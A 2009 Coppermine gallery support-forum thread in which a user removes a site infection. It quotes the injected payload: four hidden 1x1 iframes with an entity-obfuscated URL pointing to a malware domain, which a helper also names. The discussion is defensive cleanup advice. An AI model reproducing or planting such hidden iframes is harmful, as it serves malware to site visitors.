Support Forum Project Downloads FAQ Documentation About Demo Tutorials Blog Plugins
November 20, 2009, 11:00:28 pm *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Maintenance release cpg1.4.25 - upgrade recommended
The Coppermine development team is releasing an update for Coppermine in order to fix an issue with http uploads that could occur in particular versions of PHP.The fix is not security-critical, so if your gallery is running fine with cpg1.4.23 or cpg1.4.24 you don't need to upgrade. If you are running an older version than cpg1.4.23, you must update to this latest version as soon as possible because of the security impact (the past few maintenance releases before cpg1.4.24 all were security-related).
[more]
   Home   Help Search Board rules Login Register  
Pages: [1]   Go Down
  Send this topic  |  Print  
Author Topic: [Solved]: iframe at top of main page  (Read 520 times)
0 Members and 1 Guest are viewing this topic.
SpookyDan Topic starter
Coppermine novice
*
Posts: 39


« on: July 02, 2009, 05:17:24 pm »

Ive used the guides and tips on here to remove an infection/iframe code but I cant seem to find where the last piece is coming from.

This is showing up above everything on my main page if i view source:

<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe><iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe><iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe><iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

Ive cleaned out everything I thought it might be.  Any suggestions.
« Last Edit: July 03, 2009, 06:52:39 am by Joachim Müller » Logged
i-imagine
Supporter
****
Gender: Male
United States United States

Posts: 476

aka Joe Carver


WWW
« Reply #1 on: July 02, 2009, 05:55:16 pm »

You might have to do more cleaning. Be sure that the rest of your site is sanitized.
Make sure your own or other people's computers (with site admin access) are clean too.

You might be able to block the site listed in your iframe contamination. It is listed on Macafee as the source of malware.

The listing is obscured here for obvious reasons. -c-c-f-e-l-o-m-v-h-k-.-c-o-m-
(remove all dashes)

Block the site and also the ip address for the site. On your computer too.

This won't cure your infection, but might help to slow them down a little.

Ive cleaned out everything I thought it might be.  Any suggestions.
Check everything as instructed
« Last Edit: July 02, 2009, 06:07:20 pm by i-imagine » Logged

Enjoying the power of Coppermine - Art + Artists Community Gallery and My Personal Photo Gallery
Nibbler
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 19445



WWW
« Reply #2 on: July 02, 2009, 06:32:09 pm »

You probably missed include/config.inc.php
Logged

I don't care about what they say, I won't live or die that way.
SpookyDan Topic starter
Coppermine novice
*
Posts: 39


« Reply #3 on: July 02, 2009, 06:53:12 pm »

You probably missed include/config.inc.php

This file was cleaned in my original effort.  Still looks good.

Logged
Nibbler
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 19445



WWW
« Reply #4 on: July 02, 2009, 06:56:55 pm »

Post a link to the gallery.
Logged

I don't care about what they say, I won't live or die that way.
SpookyDan Topic starter
Coppermine novice
*
Posts: 39


« Reply #5 on: July 02, 2009, 07:14:00 pm »

www.urbanatrophy.com
Logged
SpookyDan Topic starter
Coppermine novice
*
Posts: 39


« Reply #6 on: July 02, 2009, 07:47:06 pm »

I found a bit of bad code remaining in one of the captcha plug-in files.  Seems to be back to normal for now.
Logged
Phill Luckhurst
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 1454


WWW
« Reply #7 on: July 02, 2009, 08:05:56 pm »

Please restore the "Powered by Coppermine" footer. Making it black on black is a bit rude and against the license.
Logged

It is a mistake to think you can solve any major problems just with potatoes.
SpookyDan Topic starter
Coppermine novice
*
Posts: 39


« Reply #8 on: July 02, 2009, 09:05:45 pm »

Please restore the "Powered by Coppermine" footer. Making it black on black is a bit rude and against the license.

I didn't do it intentionally.  Which code in the css file is associated with it.  I'll gladly fix it if I can find it.
Logged
Phill Luckhurst
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 1454


WWW
« Reply #9 on: July 02, 2009, 09:11:31 pm »

Using Firebug (the firefox plugin - https://addons.mozilla.org/en-US/firefox/addon/1843) you can find it in seconds.

Simply click inspect then move the mouse over the desired element you wish to see. In this case you will see the code

style.css (line 461)

Code:
.footer a {
color:#000000;
text-decoration:none;
}

Just change the #000000 to something like #ffffff
Logged

It is a mistake to think you can solve any major problems just with potatoes.
SpookyDan Topic starter
Coppermine novice
*
Posts: 39


« Reply #10 on: July 02, 2009, 09:23:59 pm »


Just change the #000000 to something like #ffffff

Fixed it, thanks
Logged
Pages: [1]   Go Up
  Send this topic  |  Print  
 
Jump to:  

Powered by SMF 1.1.10 | SMF © 2006-2009, Simple Machines LLC
Page created in 0.064 seconds with 17 queries.